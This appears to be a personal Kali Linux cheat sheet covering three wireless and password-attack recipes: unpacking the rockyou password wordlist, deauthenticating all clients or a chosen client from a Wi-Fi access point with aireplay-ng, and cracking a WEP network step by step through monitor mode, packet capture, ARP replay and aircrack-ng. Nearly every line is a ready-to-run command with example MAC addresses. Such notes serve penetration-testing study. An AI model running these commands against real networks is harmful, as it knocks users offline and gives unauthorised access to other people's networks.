Kali Word List / Dictionaries

cd /usr/share/wordlists
gunzip rockyou.txt.gz
ls -lh /usr/share/wordlists/
total 51M
lrwxrwxrwx 1 root root  25 Jan  3 13:59 dirb -> /usr/share/dirb/wordlists
lrwxrwxrwx 1 root root  30 Jan  3 13:59 dirbuster -> /usr/share/dirbuster/wordlists
lrwxrwxrwx 1 root root  35 Jan  3 13:59 dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
lrwxrwxrwx 1 root root  41 Jan  3 13:59 fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
lrwxrwxrwx 1 root root  45 Jan  3 13:59 fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
lrwxrwxrwx 1 root root  46 Jan  3 13:59 metasploit -> /usr/share/metasploit-framework/data/wordlists
lrwxrwxrwx 1 root root  41 Jan  3 13:59 nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
-rw-r--r-- 1 root root 51M Mar  3  2013 rockyou.txt.gz
lrwxrwxrwx 1 root root  34 Jan  3 13:59 sqlmap.txt -> /usr/share/sqlmap/txt/wordlist.txt
lrwxrwxrwx 1 root root  25 Jan  3 13:59 wfuzz -> /usr/share/wfuzz/wordlist
root@kali:~#
root@kali:~# gunzip /usr/share/wordlists/rockyou.txt.gz
root@kali:~#
root@kali:~# wc -l /usr/share/wordlists/rockyou.txt; ls -lah /usr/share/wordlists/rockyou.txt
14344392 /usr/share/wordlists/rockyou.txt
-rw-r--r-- 1 root root 134M Mar  3  2013 /usr/share/wordlists/rockyou.txt
root@kali:~#

References
https://tools.kali.org/password-attacks/wordlists
https://www.wirelesshack.org/word-list-dictionaries-built-into-kali.html

Deauthentication attack in Wifi with Aircrack-ng

deauthenticate all clients in a network

aireplay-ng --deauth [number of deauth packets] -a [access point mac] [monitor interface]
aireplay-ng --deauth 10 -a FC:75:16:D4:CC:2A wlan0mon

deauthenticate a specific client in a network

aireplay-ng --deauth [number of deauth packets] -a [access point mac] -c [target mac] [monitor interface]
aireplay-ng --deauth 10 -a FC:75:16:D4:CC:2A -c 50:01:BB:7B:95:17 wlan0mon

References :
http://www.aircrack-ng.org/doku.php?id=deauthentication

Hack WEP Wi-Fi With Kali Linux & Aircrack-ng

list all of the wireless cards that support monitor (not injection) mode :

airmon-ng

put interface on monitor mode :

airmon-ng start [wifi interface name]
airmon-ng start wlan0

list all of the wireless networks in your area :

airodump-ng [monitor interface name]
airodump-ng mon0

WEP encrypted data packets needs to be captured :

airodump-ng -w [file name] -c [chanel name] --bssid [bssid] [monitor interface name]
airodump-ng -w /root/Desktop/hack01 -c 1 --bssid 78:54:2E:D6:9F:D5 wlan1mon

To speed up the IV’s open a third terminal window letting the second run capturing the data :

aireplay-ng -1 0 -a [bssid] [monitor interface name]
aireplay-ng -1 0 -a 78:54:2E:D6:9F:D5 wlan1mon

This will begin sending out ARP request and the data and the beacons should begin to grow quickly :

aireplay-ng -3 -b [bssid] [monitor interface name]
aireplay-ng -3 -b 78:54:2E:D6:9F:D5 wlan1mon

after collecting enough data (20000 is enough but 100000 is better) :

aircrack-ng [file name]
aircrack-ng hack01.cap

References :
http://www.wirelesshack.org/step-by-step-kali-linux-and-wireless-hacking-basics-wep-hacking-part-3.html